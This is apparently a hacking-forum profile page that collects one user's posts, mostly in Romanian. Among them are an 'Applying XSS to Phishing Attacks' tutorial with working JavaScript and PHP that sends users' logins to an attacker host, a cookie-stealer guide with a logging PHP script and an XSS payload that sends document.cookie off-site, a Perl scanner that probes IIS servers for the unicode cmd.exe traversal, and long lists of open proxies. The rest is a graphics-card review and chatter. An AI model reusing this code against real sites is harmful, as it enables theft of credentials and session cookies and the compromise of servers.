Jump to content

zbeng

Active Members
  • Posts

    2402
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by zbeng

  1. ROM: vad ca judeci munca altora da cand ne uimesti si pe noi cu un tutorial de al tau.
  2. Title: "Applying XSS to Phishing Attacks" Author: Nexus Website: nu ii m-ai functioneaza Date: 2007-04-08 -[ SUMMARY]- 0x01: Introduction 0x02: Commons (and idiots) kinds of Phishing 0x03: Starting from Cross-Site Scripting 0x04: Let's get in action 0x05: Build The Scripts 0x06: Let's Summarize 0x07: Alternatives 0x08: Prevention 0x09: Conclusions ---------------------------------------------------------------- ---[ 0x00: Hello There! ] Hi to everybody right there! I'm here again to continue talking with you about the now-a-days security issues of Cross-Site Scripting and now introduce the Phishing attacks. Perfect! The coffee maker is on the burner, i got some chips and my laptop with Smashing Pumpkins shouting out loud! I'm ready to get on.. Shoutouts: this paper is dedicated to all those websites (even important) which i have mailed informing of Cross-Site Scripting vulnerabilities (and Phishing consequently) in their web applications, and never replied to me: good luck! -----------------------------------------------------------------------------[/] ---[ 0x01: Introduction ] So.. the today's theme is Phishing! This word came out a lot in these months actually because it's a obvious consequence of recent Cross-Site Scripting abuses. Just like XSS, the phishing "attacks" (this quoting marks will be explained later) are often understimated by webmasters and web coders in generals, and even for the same reason: it's not an active kind of attack like SQL Injection is.This thoughts are completely wrong, and as recent events prove, they get severely punished Let's clarify what "Phishing" means.. This word has been used for the first time in 1996 and it represented all that illegal acts that permits an "attacker" (or "phisher") to get private informations in order to gain control on that person electronic identity, using some comunications instruments (like email) and some smart social engineering. Actually Phishing means quite the same, but it's getting a more definitive shape in the last years with the born of new vulnerabilities just like Cross-Site Scripting which make those frauds easier to accomplish. -----------------------------------------------------------------------------[/] ---[ 0x02: Commons (and idiots) kinds of Phishing ] Everybody at least once received a strange email which seems to come from a trusted website (maybe a statal service like the Postal one) which invites to authenticate in the linked page or to submit confidential infos, but that in reality are just some fake mails with quite good ripped layout. These are just some idiots examples of Phishing attacks attempts: and often are even tagged by the AntiSpam service running on your mail server. Usually this kinds of Phishing rips the real website graphics in order to make the email more credible, and provide you a crafted url link in which you are invited to submit some infos (for example your login credentials). An example of link that could be used is like (in an HTML page): www.trustedsite.com You'd say now "lol, it's just a stupid attempt to make me browse into a website that is not that one proposed": actually.. yes! It seems really a ridiculous try, but belive me.. there are lot of people who fall in this trap (and if you don't believe me, just visit the http://antiphishing.org proposed stats). Assuring that, even if it's a really stupid attempt, that tecnique get quite lots of victims.. try to imagine how many problems can create a well builded Phishing attack! -----------------------------------------------------------------------------[/] ---[ 0x03: Starting from Cross-Site Scripting ] Ok, i'm not gonna deal again with XSS deeply, if you want some more infos about that just look at my previous Paper at this URL: http://www.playhack.net/view.php?type=1&id=18 (if the url doesn't exists just browse in the Papers directory and you'll find it for sure) Now that we clarified a little what Phishing really is, what tha hell XSS concerns with that?? You may ask yourself. The answer: XSS allows to a smarter (than the previous ones ) attacker to build up a well defined Phishing attack getting the trusted website really involved and making the attempt of fraud less suspicious and more efficient! If a website is vulnerable to Cross-Site Scripting it's useless to remind you that is possible to make all JavaScript codes we want to be run! And that's really a great advantage If we (in a figurative way obviously ) can get any JS to be run, so maybe we could "hijack" that website behaviour and maybe his reaction to common actions too! Uhmmmm.. -----------------------------------------------------------------------------[/] ---[ 0x04: Let's get in action ] Let's proceed step by step using a simple example to make all cleaner. So.. we've just said that Phishing if well builded it's a strong attack tecnique and we said also that we can use Cross-Site Scripting to accomplish this "fraud" in a smarter and more effective way.. ok, but how? Assure that we got the website we want to disfrut for "our" (let me use the first plural person, not for lamering but to simplify my english writing, please XD) purpose: maybe this website is vulnerable to some Cross-Site Scripting in it's code. Ok, we're lucky.. the website is vulnerable in it's Search Engine (as often) and it permits to execute arbitrary JavaScript code: let's try some simply cheats <script>alert("XSS");</script> <script>alert(document.cookie);</script> Fine! They works out and the website doesn't make any filter on the apexs. It could be useful because, let's take a look to the HTML code of the page: <form method="POST" action="somepage.php" name="userslogin"> User: <input type="text" name="user"> Pass: <input type="password" name="pass"> <input type="submit" name="submit" value="Login"> </form> There's a login form and it doesn't seems to be vulnerable to SQL Injection (obviously because if it was this paper got to be already ended ), we can use the previous found XSS vulnerability in some way. Here are the informations we need to use: - there's a login form called "userslogin" - the user textfield will be "userslogin.user" - the pass textfield will be "userslogin.pass" Actually, if the page includes both the Login Form and the Search Engine too, we can try to hijack the submited input datas not to "somepage.php" but to a pre-builded capturing page on some remote host under our control. The attempt we're going to do is to induce the users to make login into the crafted link we should provide them, and it could be something like: http://trustedsite.com/index.php?s= <script src="http://attackerhost.com/phishing.js"></script> That encoded will look like: http://trustedsite.com/index.php?s=%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%63%6F%6D%2F%70%68%69%73%68%69%6E%67%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E -----------------------------------------------------------------------------[/] ---[ 0x05: Build The Scripts ] Now we quite got the idea of what we're going to do, let's note down some code that could be used in the evil phishing.js script. /* phishing.js */ // Sets the login form name Form = document.forms["userslogin"]; function stealLogin() { // Creates a new <iframe> element var iframe = document.createElement("iframe"); // Force the iframe to be hidden iframe.style.display = "none"; // Loads the malicious PHP code into the iframe iframe.src = "http://attackerhost.com/getlogin.php?user=" + Form.user.value + "&pass=" + Form.pass.value; // Append that iframe into the body code document.body.appendChild(iframe); } // On users submit action hijacks the infos to the previous function Form.onsubmit = stealLogin(); /* EOF */ With this code we redirect the submitted login credentials to our script which create an hidden iframe in the page's body and in which is loaded another malicious PHP Script that dump the submitted user and password and saves them somewhere. That code could something like: /* getlogin.php */ <?php if(isset($_GET['user']) && isset($_GET['pass'])) { // Sets the path and opens the dump file $file_path = "stolenlogins.txt"; $file = @fopen($file_path, "a"); // Generate the string $string = "User: ". $_GET['user'] ." and Pass: ". $_GET['pass'] . "\n"; // Writes the datas and close the opened file @fwrite($file, $string); @fclose($file); } ?> /* EOF */ This file is really easy to understand: it simply gets the stolen login user and password and write them down into a dump file. Combinating these two malicious scripts the attacker can really get important and confidential informations simply exploiting a "little" (as webmasters often define them) vulnerability combined to the possibility of users log into the web application. -----------------------------------------------------------------------------[/] ---[ 0x06: Let's Summarize ] We got all the scripts written and working it seems.. let's sum out how the attack can take place: - the attacker found a XSS vulnerable website - the purpose is to steal accounts informations - the attacker write a JavaScript that hijack the submitted login form input to a pre-builded PHP script that dumps the users and passwords it gets - the attacker provides the crafted XSSed url where users can log in - the user as it comes log into the system - the JavaScript get in action and make the PHP script dumps the login informations - the attacker stole accounts using the combination of XSS and Phishing. As we can see it's quite simple to get all these stuff works out well avoiding big problems like building fake login systems on external webservers (which is indeed a big risk factor). -----------------------------------------------------------------------------[/] ---[ 0x07: Alternatives ] It can happens that the Cross-Site Scripting vulnerable code doesn't coincide with the login form page, so the attacker needs to force the XSSed page to open up that page and use it afterwards. Always starting from our crafted url: http://trustedsite.com/index.php?s=<script src="http://attackerhost/phishing.js"></script> We can modify the "phishing.js" script forcing the website to open up the page we want the user to login. /* phishing.js */ Form = document.forms["userslogin"]; function forceLogin() { var loginiframe = document.createElement("iframe"); var loginiframe.src = "http://trustedsite.com/login.html"; document.body.appendChild(loginiframe); } function stealLogin() { var iframe = document.createElement("iframe"); iframe.style.display = "none"; iframe.src = "http://attackerhost.com/getlogin.php?user=" + Form.user.value + "&pass=" + Form.pass.value; document.body.appendChild(iframe); } window.onload = forgeLogin(); Form.onsubmit = stealLogin(); /* EOF */ As you may have noticed this "new version" of phishing.js force the page to load the login page into a new iframe in order to get full control even on different pages. Obviously this code needs to be customized on the trusted site appearance. -----------------------------------------------------------------------------[/] ---[ 0x08: Prevention ] Ok, as we actually know how to build up a smart Phishing attack attempt we need to know also how we can prevent to this kind of frauds. There are not all that much things to do, just be aware of a couple of things: 1- Force your Mail Viewer program to accept only text-plained messages; 2- Check if proposed and effective links coincides; 3- Never browse a website that got encoded characters in his url; 4- Be SURE in what you're going to auth in. There are also several tools for different browsers to trying avoiding phishing attacks, but they aren't efficient at 100%: it's better to be careful ourselves. -----------------------------------------------------------------------------[/] ---[ 0x09: Conclusions ] This is the end of this Paper! It's quite long but i think i written down something that can really be interesting for those of you who are getting involved into web applications security. Obviously all the techniques and codes provided in this paper are for educational purpose ONLY: this tutorial is free as much you are free not to read it. I'm not responsibile of any use you'll make of these information, got it? By the way.. I hope that i've got quite well explained deeply what is the actual situation concerning these kinds of vulnerabilities and tecniques! Stay tuned for upcoming stuff! -----------------------------------------------------------------------------[/]
  3. Aºteptam de mult ca o placã graficã din seria 8800GTX cu rãcire pe apã sã treacã pragul laboratorului CHIP. Prima care s-a încumetat este ASUS EN8800GTX AQUATANK Water Cooling. Putem spune cã bine a fãcut deoarece locul ocupat în urma testelor în topul dedicat categoriei din care face parte este cel mai bun cu putinþã: prima poziþie. Specificaþiile acestui model sunt cele mai ridicate pe care le-am întâlnit pânã în acest moment: core grafic G80 ce funcþioneazã la 630 MHz, procesoare de stream-uri setate la 1450 MHz ºi memorii tactate la 2060 MHz. Sistemul de rãcire este cel care face ca acest accelerator sã fie special. El poartã semnãtura Thermaltake, un nume cunoscut pe piaþa producãtorilor de soluþii de rãcire. Practic, rãcirea este împãrþitã în douã pãrþi: cea de pe placa video ºi o extensie ce se monteazã într-unul din sloturile PCI de pe placa de bazã. Prima parte se „ocupã” de memorii cu ajutorul unui ventilator. Rãcirea core-ului grafic este fãcutã cu apã, care comunicã între cele douã „plãci” prin intermediul unor furtunuri. Pe placa de extensie se gãseºte rezervorul de lichid, o pompã ce îl pune în miºcare ºi un radiator rãcit de asemenea de un ventilator. Putem chiar realiza o configuraþie SLI cu aceste modele, însã grijã mare cãci spaþiul ocupat de o singurã placã video de acest gen este destul de mare. Concluzie: Chiar dacã diferenþa de preþ pânã la o placã cu rãcire normalã este destul de mare, sã fie acesta un impediment pentru cei cu adevãrat pasionaþi? Dacã nu, atunci grãbiþi-vã cãci placa face parte dintr-o ediþie limitatã. Bus memorie: 384 bit
  4. Tools used: Free hosting that support php 2 php pages Vulnerable site. Let's work: First register a free hosting account. You can try on this sites: http://www.funpic.de ; http://www.altervista.org ; http://www.netsons.org . After all: registration and activation, we need to upload this 2 php pages on the site. vb.php <head> <meta http-equiv="Content-Language" content="it"> <title>Cookies Stealther - Designed and programmed by R00t[ATI]</title> </head> <body bgcolor="#C0C0C0"> <p align="center"><font color="#FF0000">COOKIES STEALTHER</font></p> <p align="center"><font face="Arial" color="#FF0000">By R00T[ATI]</font></p> <p align="left"></p> </body> documents.php <?php $ip = $_SERVER['REMOTE_ADDR']; $referer = $_SERVER['HTTP_REFERER']; $agent = $_SERVER['HTTP_USER_AGENT']; $data = $_GET[c]; $time = date("Y-m-d G:i:s A"); $text = " ".$time." = ".$ip." User Agent: ".$agent." Referer: ".$referer." Session: ".$data." "; $file = fopen('vb.php' , 'a'); fwrite($file,$text); fclose($file); header("Location: http://www.google.com"); ?> Vb.php file is used to SHOW at the attacker what cookies are grabbed and other information. documents.php file is used to GRAB information at the victim like: ip address, user agent and naturally cookies. Now, we need to find vulnerable site to Cross Site Scripting (XSS). After this insert a script that call documents.php that grab document cookie by using "c" method: documents.php?c="+document.cookie; For example: http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location="http://syshack.sy.funpic.de/documents.php?c="+document.cookie;</script> Victim will be redirected to http://www.google.com (edit it in documents.php). And the attacker can be see victim cookies on vb.php
  5. a mele erau private nu le vei gasi pe acele siteuri cu proxy publice;)(
  6. 213.76.251.222:1080 85.31.187.110:9050 64.30.72.192:28517 220.172.150.153:14073 200.195.33.26:1080 66.30.203.92:33836 189.32.6.158:8080 67.151.147.66:1080 150.214.39.147:1080 71.128.7.155:43887 207.244.158.34:8080 83.243.108.45:1080 65.209.17.114:1080 209.10.181.175:1080 87.240.4.116:1080 201.253.88.182:1080 69.27.69.234:63680 63.148.167.30:1080 64.53.145.231:51091 216.70.243.62:1080 76.177.230.105:36478 86.20.148.141:6052 82.7.247.243:1080 200.176.245.72:4500 76.98.8.116:4922 76.104.126.64:6061 71.203.208.131:50791 71.192.65.75:3358 69.244.193.4:21788 68.81.146.96:6052 67.176.147.246:3764 75.6.153.50:7769 75.28.0.141:1080 68.88.212.155:58 213.22.16.204:8888 84.36.217.188:4500 82.79.65.238:1080 80.89.185.36:1080 80.240.195.171:1080 70.100.54.93:1325 69.64.74.87:1080 68.88.212.155:58 66.227.239.231:9916 61.180.240.19:1080 61.142.81.37:1080 59.124.6.116:1080 59.124.6.116:1080 58.216.237.86:1080 219.91.229.30:1080 220.226.253.211:1080 218.108.66.36:1080 213.197.162.67:1080 211.144.105.5:1080 211.113.246.112:25552 211.104.159.54:4769 201.12.22.118:1080 200.171.175.243:1080 200.195.33.210:1080 189.19.66.26:1080 189.19.25.83:1080 189.19.18.66:1080 189.19.0.46:1080 189.5.152.55:1080 168.114.24.140:1080 162.105.18.230:1080 61.178.148.123:1080 12.219.192.164:8263 59.92.89.113:1080 220.217.50.197:22749 24.37.16.196:21204 85.204.151.59:2537 58.141.195.61:12890 220.166.130.102:15528 163.180.28.152:31475 195.177.73.47:1080 212.0.87.6:1080 212.0.69.146:1080 194.247.137.222:1080 202.3.217.122:1080 80.72.117.58:1080 81.3.190.66:1080 81.3.190.66:1080 200.72.13.99:1080 81.171.197.237:1080 81.30.211.112:1080 71.96.73.125:20297 195.112.249.22:1080 59.146.77.115:9086 67.83.183.201:7305 219.67.184.48:16963 195.145.174.1:1080 196.36.119.104:25434 217.170.118.78:1080 217.170.114.147:1080 80.251.248.134:1080 80.246.83.236:1080 195.112.113.162:1080 203.198.213.129:1080 81.9.21.142:1080 81.9.21.142:1080 80.237.4.209:1080 80.247.109.198:1080 81.177.17.20:1080 80.242.68.121:1080 80.83.244.67:1080 195.131.179.29:1080 195.131.169.232:1080 195.131.143.213:1080 195.131.117.107:1080 195.131.100.107:1080 80.237.120.18:1080 155.208.254.132:1080 80.84.116.248:1080 80.253.232.14:1080 82.197.166.35:1080 81.13.20.174:1080 84.53.199.198:1080 81.30.218.189:1080 81.30.206.124:1080 81.30.204.47:1080 81.30.204.46:1080 80.77.83.64:1080 213.188.33.64:23314 190.55.110.159:1080 80.66.64.30:1080 202.8.85.183:1080 193.41.86.151:1080 86.104.197.63:1080 195.19.225.74:1080 200.218.140.56:1080 69.138.39.172:6016 193.41.86.150:1080 155.208.254.117:1080 155.208.254.116:1080 195.96.248.134:1080 81.13.30.242:1080 81.13.30.242:1080 217.167.1.125:1080 89.215.28.165:1080 89.38.147.73:1080 83.237.85.59:1080 83.237.69.226:1080 83.237.68.202:1080 81.28.191.163:1080 81.28.191.163:1080 81.195.86.18:1080 81.195.138.194:1080 81.195.110.254:1080 81.16.142.169:1080 81.16.142.169:1080 81.16.131.185:1080 81.16.131.185:1080 80.94.240.51:1080 80.91.17.59:1080 80.89.150.254:1080 80.81.212.162:1080 80.77.82.16:1080 80.77.81.64:1080 80.76.177.161:1080 80.76.139.52:1080 80.73.165.194:1080 80.71.222.34:1080 80.69.146.54:1080 80.66.83.130:1080 80.254.48.73:1080 80.251.115.192:1080 80.250.191.102:1080 80.237.8.210:1080 80.237.16.227:1080 80.237.109.164:1080 68.185.34.140:1080 61.135.206.11:23246 61.128.162.235:8080 201.39.35.227:1080 222.215.67.54:1080 221.136.96.243:1080 220.198.199.24:29526 220.166.130.102:7742 220.123.42.216:22250 219.232.226.17:20866 218.247.166.82:1080 212.60.244.150:1080 212.0.73.146:1080 211.233.19.47:24270 211.191.255.120:8887 211.191.255.120:8842 211.191.255.120:6720 211.119.132.80:1080 211.119.132.117:1080 201.36.165.50:1080 201.24.132.138:1080 201.53.220.6:1080 201.49.5.35:1080 200.41.67.42:1080 200.223.25.174:1080 200.195.23.167:1080 200.142.162.226:1080 200.142.162.218:1080 196.47.72.73:1080 196.3.143.25:6272 195.96.75.2:1080 195.38.54.2:1080 195.161.148.206:1080 195.131.196.177:1080 195.131.184.121:1080 195.12.83.198:1080 195.113.156.200:1080 195.112.241.82:1080 194.150.146.69:1080 193.26.218.153:1080 193.188.82.2:1080 189.19.24.143:1080 168.210.112.5:19433 164.125.81.183:40449 162.105.71.47:1080 124.138.92.206:32894 201.39.49.104:1080 85.187.158.179:9050 203.124.102.106:80 200.233.77.222:1080 195.113.207.141:1080 193.165.72.136:1080 193.109.183.91:1080 195.146.114.114:1080 194.228.123.230:1080 195.128.17.134:1080 81.10.23.43:1080 81.10.23.43:1080 81.1.201.233:1080 195.19.128.54:1080 195.113.177.94:1080 195.113.177.95:1080 63.193.155.218:1080 80.250.17.7:1080 61.17.38.212:1080 61.17.160.151:1080 80.38.56.37:1080 201.238.247.107:1080 200.204.195.147:1080 200.74.130.118:1080 83.208.24.124:1080 195.206.40.65:1080 212.0.76.250:1080 195.206.53.22:1080 195.162.47.48:1080 202.3.211.98:1080 193.110.5.220:1080 193.110.5.219:1080 210.159.65.4:1080 195.114.129.202:1080 194.66.175.68:1080 195.54.22.161:1080 195.230.64.3:1080 193.68.6.1:1080 193.175.85.14:1080 193.175.85.10:1080 195.54.22.193:1080 194.7.83.94:1080 194.19.238.194:1080 194.114.136.129:1080 130.225.55.7:1080 195.201.253.117:1080 193.93.48.109:1080 195.140.176.58:1080 195.66.196.130:1080 198.80.191.10:1080 80.237.116.100:1080 81.3.189.98:1080 81.3.189.98:1080 195.239.204.58:1080 195.144.239.62:1080 80.77.80.55:1080 195.54.22.129:1080 195.69.184.117:1080 210.189.34.65:1080 80.71.164.222:1080 194.44.209.68:1080 193.16.45.146:1080 194.44.179.69:1080 194.44.213.213:1080 195.206.56.242:1080 195.54.22.241:1080 195.206.52.34:1080 195.131.83.247:1080 193.233.51.121:1080 81.22.205.39:1080 195.140.179.237:1080 81.3.129.117:1080 195.206.51.195:1080 195.206.40.106:1080 147.162.53.205:1080 211.4.171.113:1080 195.46.113.129:1080 195.54.22.74:1080 202.8.85.179:1080 194.183.188.196:1080 61.215.199.10:1080 195.206.57.222:1080 195.206.40.230:1080 195.206.52.18:1080 195.54.22.217:1080 195.206.52.186:1080 195.46.96.97:1080 194.44.43.175:1080 195.161.176.105:1080 80.192.6.240:1080 80.77.86.65:1080 80.77.84.84:1080 80.77.84.247:1080 80.77.83.107:1080 80.253.15.50:1080 61.144.54.44:1080 61.144.54.43:1080 61.144.54.42:1080 61.144.54.41:1080 61.144.54.40:1080 61.135.133.192:1080 59.77.9.123:1080 58.82.37.20:1080 195.5.52.108:1080 218.93.12.226:1080 218.75.42.178:1080 218.19.141.27:1080 211.132.8.209:1080 211.126.208.98:1080 211.119.132.8:1080 211.119.132.79:1080 211.119.132.119:1080 211.119.132.116:1080 211.119.132.115:1080 210.83.208.75:1080 210.17.240.193:1080 209.52.89.29:1080 203.130.237.180:1080 203.130.237.178:1080 195.69.184.145:1080 195.54.22.153:1080 195.50.13.33:1080 195.239.167.126:1080 195.137.201.54:1080 195.112.113.36:1080 194.213.21.137:1080 194.186.102.230:1080 193.110.5.221:1080 193.110.5.218:1080 190.16.178.177:4500 195.24.140.238:1080
  7. nemessis ce drecu tia venit mi-ai luat pfta de mancare si de toate=?)))
  8. chiar imi trebuia ceva si mie pt wireles;)
  9. Deci asta e un forum;) pe forumuri se descuta Il stiam nu e o fraza de bagare in seama asa ca incet nu o ardeti in off topic:D
  10. * 168.61.70.36:9032 200.172.182.53:1080 200.176.245.72:4500 200.195.33.26:1080 201.43.75.90:1080 211.104.159.54:4769 * 216.70.243.62:1080 * 24.19.182.81:60259 24.2.13.173:15272 *24.46.76.194:5828 59.186.67.28:4769 61.37.57.109:1095 * 65.209.17.114:1080 66.227.239.231:9916 67.80.42.1:6081 67.83.183.201:7305 68.253.24.178:9345 68.36.68.84:6052 68.56.119.100:10161 69.138.39.172:6016 69.27.69.234:63680 72.198.17.78:1166 72.240.181.75:6081 74.116.85.189:4500 75.34.123.115:5019 75.6.153.50:7769 82.234.137.120:25552 82.32.113.166:20409 * 86.20.148.141:6052 * 86.7.68.23:4500 _________________Ip MARCATE CU * SUNTE ACELE PROBATE!
  11. zbeng

    XSS Scanner v1.3

    il am si eu da inca nu l-am probat daca l-ai probat zimi cum iti merge?
  12. AlucardHao te rog sa verifci linku inainte de a posta . se muta la gunoi
  13. #!/usr/bin/perl # uni-test.pl # this is a test program and should be used for educational purposes ONLY! # NOTE: this was written on a RH Linux6.2 X86 based system. # you will also need to DL and compile the LWP::Simple.pm module for perl use LWP::Simple; use Getopt::Std; getopts("vt:?",\%args); # here goes nothing... if ( $args{t} ) { $target = $args{t}; } else { usage(); } if ( $args{"?"} ) { usage(); } print "Running nmap...\n"; if ( $args{v} ) { system("nmap -sS -p 80 -O $target -oM /tmp/targetnet"); } else { system("nmap -sS -p 80 -O $target -oM - > /tmp/targetnet"); } open(TARGETNET, "/tmp/targetnet") || die "Cannot open file: /tmp/targetnet"; print "Please hold checking all servers in list\n"; print "----------------------------------------\n\n"; while (<TARGETNET>) { (/^\n/) && next; (/Starting nmap/) && next; (/^\#/) && next; if ( /^Host: ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*?OS: (.*)/ ) { $ipaddress = $1; $osguess = $2; if ( $osguess =~ /NT4/ || $osguess =~ /Windows 2000/ ) { print "Checking $ipaddress for uni-code exploit\n"; $content = get("http://$ipaddress/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\"); if ( $content =~ /Directory of c\:\\/ ) { print "$ipaddress is vulnerable\n"; } } } else { warn "Cannot parse: $_"; } } close(TARGETNET); sub usage { print <<USAGE; Usage: perl uni-test.pl [-v?] -t <target host/net> -v Verbose ( Show nmap output ) -? Show this screen -t <target> <target> is the nmap host or range you would like to scan sample: 192.168.0.2-254 Note: This program requires you to be root, and for you to have the program NMAP installed. USAGE exit; }
  14. Sock 5 24.31.130.16:51826 71.128.7.155:43887 70.129.155.209:38631 24.20.252.32:20534 24.2.13.173:15272 24.47.140.52:6081 66.229.103.146:5853 69.242.153.187:3328 68.39.187.211:3128 24.125.241.207:3128 172.187.33.185:1080 221.136.96.243:1080 61.178.148.123:1080 60.190.79.18:1080 217.77.222.200:1080 Socks 4 211.232.42.182:50033 218.200.49.5:1080 202.97.136.5:1080 87.246.44.129:1080 218.66.75.15:1080 190.90.25.218:1080 217.139.85.35:1080 208.35.100.2:1080 201.88.104.194:1080 125.72.28.38:1080 89.38.147.73:1080 HTTP 195.55.133.76:8080 202.69.140.10:8080 61.47.15.133:8080 61.27.115.11:8000 212.247.223.194:7212 200.160.150.163:3128 12.13.70.240:3128 200.66.191.1:80
  15. 121.136.16.246:2519 122.197.130.107:2556 125.212.249.234:2820 125.212.68.173:2578 172.159.149.202:6588 200.165.140.104:6588 201.52.62.206:6588 204.244.136.153:2737 207.155.32.132:2526 207.244.165.172:2788 211.51.244.21:2527 212.64.41.11:2328 213.114.18.63:2408 213.47.192.201:8000 213.93.160.159:2625 218.233.35.126:2612 220.81.242.150:2693 24.1.229.196:2450 24.11.3.156:2194 24.138.152.187:2501 24.141.138.32:2335 24.143.29.244:2440 24.147.151.57:2379 24.154.141.21:2340 24.161.210.103:2498 24.165.124.162:2475 24.184.109.141:2458 24.184.232.55:2495 24.192.194.31:2441 24.211.45.247:2527 24.215.67.79:2385 24.238.251.34:2547 24.239.249.89:2601 24.240.43.136:2443 24.247.94.34:2399 24.45.249.82:2400 24.60.13.74:2171 58.147.0.227:8080 59.0.183.212:2454 62.139.166.210:2577 62.234.40.209:2545 65.33.119.48:2265 65.34.207.171:2477 65.96.31.79:2271 66.41.255.239:2601 66.56.12.228:2362 66.65.210.63:2404 66.65.212.121:2464 66.74.12.121:2273 67.149.223.118:2557 67.166.208.118:2559 67.175.211.226:2679 67.189.154.67:2477 67.80.187.83:2417 67.80.94.216:2457 68.1.164.24:2257 68.109.180.22:2379 68.196.163.232:2659 68.37.153.55:2313 68.37.88.118:2311 68.40.217.108:2433 68.41.19.191:2319 68.41.244.21:2374 68.50.139.149:2406 68.51.14.122:2255 68.56.177.92:2393 68.58.24.124:2274 68.59.224.185:2536 68.80.127.64:2339 68.96.131.115:2410 69.113.228.208:2618 69.121.40.136:2366 69.123.158.121:2471 69.136.32.198:2435 69.139.72.96:2376 69.14.211.102:2396 69.140.67.5:2281 69.141.42.213:2465 69.245.122.79:2515 69.248.191.152:2660 69.253.170.82:2574 69.255.186.69:2579 70.191.127.182:2570 71.159.156.250:2636 71.200.236.26:2533 71.201.216.239:2727 71.205.163.0:2439 71.207.239.136:2653 71.224.47.218:2560 71.229.104.10:2414 71.233.192.5:2501 71.233.38.234:2576 72.174.4.202:2452 72.187.28.212:2499 72.193.86.189:2540 72.201.216.181:2670 72.207.250.52:2581 72.228.23.51:2374 72.231.161.234:2698 72.49.192.92:2405 74.115.70.44:2303 74.129.4.44:2251 74.130.18.29:2251 74.170.200.111:2555 74.79.190.153:2496 74.79.199.143:2495 75.67.140.2:2284 75.67.211.176:2529 76.108.5.254:2443 76.171.16.198:2461 76.18.201.125:2420 76.183.50.14:2323 76.19.83.103:2281 76.98.114.94:2382 76.98.127.1:2302 77.96.176.70:2419 80.108.220.249:2657 80.216.99.129:2524 80.33.219.176:2508 81.220.232.176:2709 81.226.12.151:2470 82.209.142.251:2684 82.44.192.10:2328 82.72.148.21:2323 82.74.9.15:2180 82.76.118.24:2300 83.251.6.176:2516 83.252.170.101:2606 83.86.35.222:2426 84.108.182.228:2602 84.120.186.10:6588 84.31.101.109:2325 84.75.43.183:2385 85.115.122.122:2444 85.120.128.251:2584 86.105.255.191:2637 87.240.4.116:6588 89.212.45.120:2466 89.34.221.209:2553 89.34.35.188:8080 90.227.1.111:2429 99.244.82.218:2643
  16. Download-Link: http://rapidshare.com/files/36319096/RockOutV2_rst_zbenguu.zip.html
  17. Anyway ill try to keep this updated with few socks everyday. Voi incerca sa fac update in fiecare zi. 71.128.7.155:43887 * 72.240.181.75:6081 65.60.217.153:6081 * 66.229.103.146:5853 * 89.38.147.73:1080 203.187.235.106:1080 * 61.178.148.123:1080 Acelea marcate cu * sunt verificate.
  18. http://www.godaddy.com/gdshop/registrar/search.asp?isc=gdm0602 Get .INFO for $0.99, .COM for $6.95 and .US for only $6.99! http://www.dreamhost.com/hosting.html Coupon code 555 (not mine) - $50 off, plus webspace at 500 GB instead of 150 GB, and 5 domains. http://www.netfirms.com/max 2 domains + hosting for 1 year at $10. IMO the hosting is nothing great, but 2 domains for $10 is a decent bargain
×
×
  • Create New...